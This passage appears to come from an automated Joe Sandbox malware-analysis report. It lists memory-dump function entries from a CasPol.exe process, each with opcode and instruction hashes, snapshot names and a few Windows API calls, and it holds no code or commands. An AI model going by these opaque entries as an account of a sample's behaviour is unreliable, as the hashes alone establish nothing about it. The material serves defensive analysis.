                                                                                                                          • Opcode ID: 1cfbfca0f106fd4fcf13242da7cde4ad4bc27d4d3ee772eeef6e6cb8b0226a9b
                                                                                                                          • Instruction ID: 9a75559e84f67bb56dc7e9049f04bfb138d666607d27535e3ea6bf441f697fc4
                                                                                                                          • Opcode Fuzzy Hash: 1cfbfca0f106fd4fcf13242da7cde4ad4bc27d4d3ee772eeef6e6cb8b0226a9b
                                                                                                                          • Instruction Fuzzy Hash: 2611E5B5D042888FDB10CFAAD488BDEBBF4EB49324F148459D558AB600C3B4A944CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1F9B53B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37852102301.000000001F9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1f9b0000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: a0a5f4400913904c4033d9d98ae7219eaefecb60b1f99124e460d9fbd3454dc6
                                                                                                                          • Instruction ID: 4c0eb14a945f2d5faeff10d4bd1c98081a1c86a2d0cc8c699645fab101510b9a
                                                                                                                          • Opcode Fuzzy Hash: a0a5f4400913904c4033d9d98ae7219eaefecb60b1f99124e460d9fbd3454dc6
                                                                                                                          • Instruction Fuzzy Hash: 421106B1800309CECB10CF9AC4047DEFBF0AF89218F1485AEC059AB256D376A146CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,017499B9,00000800), ref: 01749A4A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824662554.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1740000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 9ed625cb1bda17587f5084c8f714cd97a453aa0cdc6c1336f22577fa75f76f66
                                                                                                                          • Instruction ID: ecd3143bacb438c3755150993bf40bfba336fb84b1f45fe716ab45dac38fe061
                                                                                                                          • Opcode Fuzzy Hash: 9ed625cb1bda17587f5084c8f714cd97a453aa0cdc6c1336f22577fa75f76f66
                                                                                                                          • Instruction Fuzzy Hash: DBF02B726083844FDB2187ADA8043CBFBD4AF46338F18445BD349D7542C3B55584C7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37820420083.0000000001120000.00000040.00000400.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1120000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 66af22ebb71da7ae3e1e4b13da24d15eb6b5d6aa77414fbb40073872b5051a9f
                                                                                                                          • Instruction ID: 32f0a0c8c3e13b51f9fda870688e6df0fa2683de924c03e5a5b500b413b1b0fd
                                                                                                                          • Opcode Fuzzy Hash: 66af22ebb71da7ae3e1e4b13da24d15eb6b5d6aa77414fbb40073872b5051a9f
                                                                                                                          • Instruction Fuzzy Hash: BCF022191087CE8AEB29AF78CC5D3EA23A6FFC1700F0000188C0947248E375D606870D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ]
                                                                                                                          • API String ID: 0-3352871620
                                                                                                                          • Opcode ID: fce12abf66c64e4d66b023bebbdf889eddfc3b2f9ac140760324b8baccac9f3d
                                                                                                                          • Instruction ID: dcd9cc8bf2779802902c297301f937fd82c235f316777948828f6b584da4cdde
                                                                                                                          • Opcode Fuzzy Hash: fce12abf66c64e4d66b023bebbdf889eddfc3b2f9ac140760324b8baccac9f3d
                                                                                                                          • Instruction Fuzzy Hash: 57A1B071A04649DFCF05CFA8CC40ADEBFB6BF89310F148156E945AB361D731A955CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hkl
                                                                                                                          • API String ID: 0-3000489276
                                                                                                                          • Opcode ID: 015198fd56fc4e0395e05f1d0aa19a2fb7492696929bfdc029007982e22cd3ae
                                                                                                                          • Instruction ID: 0f22c3568547f56ca8dfdf28d41767ffbcf74985a494f5dd15a2a421daeaf81b
                                                                                                                          • Opcode Fuzzy Hash: 015198fd56fc4e0395e05f1d0aa19a2fb7492696929bfdc029007982e22cd3ae
                                                                                                                          • Instruction Fuzzy Hash: 5A4117353042549FDB099F29DC55A6E3BEAFF8A360B058069F94ACB391CB35DC12CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'gl
                                                                                                                          • API String ID: 0-230109340
                                                                                                                          • Opcode ID: 7babd140de57261553b0ba73344a73f9dc449f14b010d0d3d296628d2cee31c7
                                                                                                                          • Instruction ID: 838bb06116c34eef794516f76118c839f354ca9dac4cee5c47a771d025391543
                                                                                                                          • Opcode Fuzzy Hash: 7babd140de57261553b0ba73344a73f9dc449f14b010d0d3d296628d2cee31c7
                                                                                                                          • Instruction Fuzzy Hash: 27414874B001159FDB15CF29C988AAE7BB9FF89315F000569E90A8B3A1CB32DC51CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'gl
                                                                                                                          • API String ID: 0-230109340
                                                                                                                          • Opcode ID: 888a9c20444b400b9c5f054592a425ded0502d1e4cfa1cbb787ecd2a900d6599
                                                                                                                          • Instruction ID: b2ac2bcc2de2b8705f561cff8685df29d06a1093a1fb6159c4659e2ec28ae253
                                                                                                                          • Opcode Fuzzy Hash: 888a9c20444b400b9c5f054592a425ded0502d1e4cfa1cbb787ecd2a900d6599
                                                                                                                          • Instruction Fuzzy Hash: 0A2186317042659FD714CE6BCC84A7BBBEEBB85210F05442AF95ACB359DB32D812C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHgl
                                                                                                                          • API String ID: 0-4202224853
                                                                                                                          • Opcode ID: 606c0471e6f7f3a787bcda4e5c9e31a65d38b5f69ac391975c73d17837be033c
                                                                                                                          • Instruction ID: 9b84cf94690a7487cc9248dab765272457479bc4251aa9c8bde1221e453e2701
                                                                                                                          • Opcode Fuzzy Hash: 606c0471e6f7f3a787bcda4e5c9e31a65d38b5f69ac391975c73d17837be033c
                                                                                                                          • Instruction Fuzzy Hash: FDE06530B0021ACBDB14EFA2D99827D7B78AF40288F108828E812E6258DF308902DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 093f5729268a52ced4dbfc54e53406f0d98bd1f2661eec3616608db418f77e06
                                                                                                                          • Instruction ID: 9a0191216b55c24660d10a4fa498cbc6edcf549efdccff08ff9d463ceca0fd3c
                                                                                                                          • Opcode Fuzzy Hash: 093f5729268a52ced4dbfc54e53406f0d98bd1f2661eec3616608db418f77e06
                                                                                                                          • Instruction Fuzzy Hash: 11F12E75A002148FCB05CF6DC985A9DBBFAFF88750F1A8069E516AB361DB71EC41CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cbdc80e63b29ed4244430c813eb1e387ea13fb727c0e2db92091a85c397f10c7
                                                                                                                          • Instruction ID: c6b57bcacd723af65d595e6f0d8e1eed70aa7566767015c6e0d96bb95ddb6046
                                                                                                                          • Opcode Fuzzy Hash: cbdc80e63b29ed4244430c813eb1e387ea13fb727c0e2db92091a85c397f10c7
                                                                                                                          • Instruction Fuzzy Hash: 5FD1E135A002058FCB15DFB8C9846AEBBF6EF88315F158569E406EB3A5DB34DC46CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5625e75b67d503ad34fe14a812fd70679c047c5112b25b970e2db5dc962b1f36
                                                                                                                          • Instruction ID: 0f59364120562da9d5770be6cb77f56352463b12cede2ec852ec885c37e26e51
                                                                                                                          • Opcode Fuzzy Hash: 5625e75b67d503ad34fe14a812fd70679c047c5112b25b970e2db5dc962b1f36
                                                                                                                          • Instruction Fuzzy Hash: 18914930704645CFDB15DF6DCC94A6A7BE9AF89204F1940AAEA05CB3B2DB72DC41CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: aef593b0ee669ef1c61227e822c4b57f75c5b5e61a1e59cd2de8e90114930684
                                                                                                                          • Instruction ID: 9276cdb5dfc8d2b5a38458050cd949d769724891b0a62bbe56a3a1b8c9713206
                                                                                                                          • Opcode Fuzzy Hash: aef593b0ee669ef1c61227e822c4b57f75c5b5e61a1e59cd2de8e90114930684
                                                                                                                          • Instruction Fuzzy Hash: 12919175A04215CFCB15CF68C885A6EBFB9FF84350F1A8469E91A9B362C735EC41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51384c0a9446a65e3ebf3c26cb5da4dc73d05408d7ea6cbfafd79f784d8589d2
                                                                                                                          • Instruction ID: 235c4f99154e78307025623c6eeae06cc27de2c5645eef76f28f01f2660ad4b7
                                                                                                                          • Opcode Fuzzy Hash: 51384c0a9446a65e3ebf3c26cb5da4dc73d05408d7ea6cbfafd79f784d8589d2
                                                                                                                          • Instruction Fuzzy Hash: C4618271E00B498FDF12CFAAC9406AEBBF6AF89314F248619D845AB345D770A985CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ee50e04c017adcd3afba124b3a8bf4723732a12d802e77db984047c6b9513de5
                                                                                                                          • Instruction ID: 87f3f122efa4c69789308c6648b749116014dd8c0f99eca82ccba923b9192fb9
                                                                                                                          • Opcode Fuzzy Hash: ee50e04c017adcd3afba124b3a8bf4723732a12d802e77db984047c6b9513de5
                                                                                                                          • Instruction Fuzzy Hash: 1B41EF747042148FDB1A9B75C89473E7AEAABCA215F09812CD606CB386CF35CC42CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6f11817f49bb4e82e23e00a5da32f37d2495b429b6d584b73e79188ffec34409
                                                                                                                          • Instruction ID: e115a11a7ae35afcfe98884570f5656651884c198818b0a83f8c15c9c88dff78
                                                                                                                          • Opcode Fuzzy Hash: 6f11817f49bb4e82e23e00a5da32f37d2495b429b6d584b73e79188ffec34409
                                                                                                                          • Instruction Fuzzy Hash: 2A518175E00B498FDF12CFA9C9406EDBBF6AF89300F24861AE845AB345D771A985CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3450f27b8f1fc633af69ae900a7d970a9afe3fbffa660decb2b965b988539b77
                                                                                                                          • Instruction ID: adf6ca1ff55ce616c59be629a69de52295600a06bd21431cf5474afeb2bf01d9
                                                                                                                          • Opcode Fuzzy Hash: 3450f27b8f1fc633af69ae900a7d970a9afe3fbffa660decb2b965b988539b77
                                                                                                                          • Instruction Fuzzy Hash: DA41B531A04A49DFCF02CFA9CC44AAD7FB9BF49350F048166E995AB351D331E915CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 65a66566ebd7e5f0a9bb0f0c782fc5769b15a029ea415f8dba6b53382c1ad891
                                                                                                                          • Instruction ID: 69f2bfe28221bcc975053e6ea0fbb3969df959b9cd6b48322a944625774ab88c
                                                                                                                          • Opcode Fuzzy Hash: 65a66566ebd7e5f0a9bb0f0c782fc5769b15a029ea415f8dba6b53382c1ad891
                                                                                                                          • Instruction Fuzzy Hash: AD4196757012159FDF069F59D894AAE7BAAFB89311F088029F91AC7351CB31DC22DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7ab5f7ac5177b668a96717631f4c13bc8924ade5e4f5b76e96ffe1b70846083c
                                                                                                                          • Instruction ID: 15cdd7023936a74153b8fe8595dafc06d9b48c1e44ba8744b1940ce26c452509
                                                                                                                          • Opcode Fuzzy Hash: 7ab5f7ac5177b668a96717631f4c13bc8924ade5e4f5b76e96ffe1b70846083c
                                                                                                                          • Instruction Fuzzy Hash: D721E0323082105BDB2A2B398E9453E76EEBFD5614708403DD50ACB3A2DB3ACC42D792
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b645ecd6768e4214af2bad667fd0ab0aec7811c6dfff3c10e6bb9f0251131fb5
                                                                                                                          • Instruction ID: 903c41234d818ba854f451c93955b6f8b95cd018445f123a55af099d8f2ad95f
                                                                                                                          • Opcode Fuzzy Hash: b645ecd6768e4214af2bad667fd0ab0aec7811c6dfff3c10e6bb9f0251131fb5
                                                                                                                          • Instruction Fuzzy Hash: CF21D0323042205BEB266A39CD9467E72DFBFD5618B18403CD50ACB795DF3ACC429791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 66d5e932e662b7dee94da3eb6734e2d3e411b1559db4ca9555622eb6327cdfb3
                                                                                                                          • Instruction ID: 59c600bbec3994dfb456da71f282fbc22a065f94d5dd189e907bbd189eaf2e75
                                                                                                                          • Opcode Fuzzy Hash: 66d5e932e662b7dee94da3eb6734e2d3e411b1559db4ca9555622eb6327cdfb3
                                                                                                                          • Instruction Fuzzy Hash: FF318F70E001058FCB04CF68C9859AEBBBAFF89350B158159E51AAB3A5CB35EC51CBD0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840023825.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d63d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9fa576f7817887c6b1d8f800d8c678e2554cec01505eb24c8ad9d284269f8e7c
                                                                                                                          • Instruction ID: 7e20acd37cc7529a76a3f98d33be8c5abb7cf925274656930354f5fe16d893be
                                                                                                                          • Opcode Fuzzy Hash: 9fa576f7817887c6b1d8f800d8c678e2554cec01505eb24c8ad9d284269f8e7c
                                                                                                                          • Instruction Fuzzy Hash: DA210671504384EFDB01CF18D9C0B1ABF65FB98729F20C569D9090B246C376D415CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840023825.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d63d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 416a26123665cd1e263fd8ac338a8408b80c9846c90d9a6e1a802df379eb1cbc
                                                                                                                          • Instruction ID: 2f66a15625deddb7948837055109756d32ec195cbe92bba5db19ea964c9c6165
                                                                                                                          • Opcode Fuzzy Hash: 416a26123665cd1e263fd8ac338a8408b80c9846c90d9a6e1a802df379eb1cbc
                                                                                                                          • Instruction Fuzzy Hash: 2521D371604244EFDB05CF18D9C0B1ABB65FBA8725F24C569D90D4B24BC336E856CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fbc5863b2553f7176e2c0203c407b9e459d23974c65391b3ea43042f98d703c4
                                                                                                                          • Instruction ID: b5c225332e3d24bd7fcc20c6294a3143e153deb74c9d184e4dccd14805d59110
                                                                                                                          • Opcode Fuzzy Hash: fbc5863b2553f7176e2c0203c407b9e459d23974c65391b3ea43042f98d703c4
                                                                                                                          • Instruction Fuzzy Hash: 1D21C3353015218BD7199A2AC894A2EB7EAFFCA655719852DE90ACB351CF25DC0387C0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840170073.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d64d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 490a544d281757a848500dee5b3a7f3a66e716ea2a9a6936bf7a18d5968a49a3
                                                                                                                          • Instruction ID: 5336d382e4fbff08a2c1cd4a2bc7b83034b393e57b537399129f6a1c6098b157
                                                                                                                          • Opcode Fuzzy Hash: 490a544d281757a848500dee5b3a7f3a66e716ea2a9a6936bf7a18d5968a49a3
                                                                                                                          • Instruction Fuzzy Hash: 2321F270A08284DFDB05CF28D9C4B16BB61FB98B14F30C5A9D9094B246C73AD846CEA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 193dc52c7921ec58b7db376682698a1a298dbc66c7d90ed6be4eb71929c69656
                                                                                                                          • Instruction ID: 8ac54db0b8b5a2fbf01bf21fdd1a4e1b8178978569b303c9d81e0b52bb6dc1c7
                                                                                                                          • Opcode Fuzzy Hash: 193dc52c7921ec58b7db376682698a1a298dbc66c7d90ed6be4eb71929c69656
                                                                                                                          • Instruction Fuzzy Hash: 2C1127353016118FD71A4B3AC96492E7BEAFFC6651319406DE906CB391CF21DC038B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840170073.000000001D64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D64D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d64d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6dfd74550cb413a9b31e712cfe2b7a3e94b7f9bf94c486ff247bfd799ded7e6d
                                                                                                                          • Instruction ID: 28722ebe2d46a08a9b73a68d7373a730160ca082ad2343e8bc46e348d31decf5
                                                                                                                          • Opcode Fuzzy Hash: 6dfd74550cb413a9b31e712cfe2b7a3e94b7f9bf94c486ff247bfd799ded7e6d
                                                                                                                          • Instruction Fuzzy Hash: CD215E755093C48FDB02CF24D994B15BF71EB4A614F28C5EAD8498F697C33AD80ACB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 69050fffcee5d9b7de0e3baa076f6ae6d3bf3405d63967210d71c296fc97ab8a
                                                                                                                          • Instruction ID: 7cac39a79096fe05f08ac929d56839e70050face568a8c7664257631321e2ad2
                                                                                                                          • Opcode Fuzzy Hash: 69050fffcee5d9b7de0e3baa076f6ae6d3bf3405d63967210d71c296fc97ab8a
                                                                                                                          • Instruction Fuzzy Hash: E3112631600A059FCB11CF5CCC40B6EBFAAEF85354F048665D5986B392C370F910C7A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d99d816d7badaa956f9063173ad5e0098267b33b7a9d5a3d36878da0b08c0b2c
                                                                                                                          • Instruction ID: 8e688df82e4179de8ce6624c8aba7e43f6f69e45f89412d09a2dcacaa4245888
                                                                                                                          • Opcode Fuzzy Hash: d99d816d7badaa956f9063173ad5e0098267b33b7a9d5a3d36878da0b08c0b2c
                                                                                                                          • Instruction Fuzzy Hash: BF21CA31A00218DFCB24CF54CD58BAABBE6EB08310F00846EE50ADB252D375DD54CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eae84817c4e7035976c104449d9a1c0bc612cef0952bd61d505bf6fe7fba5fcc
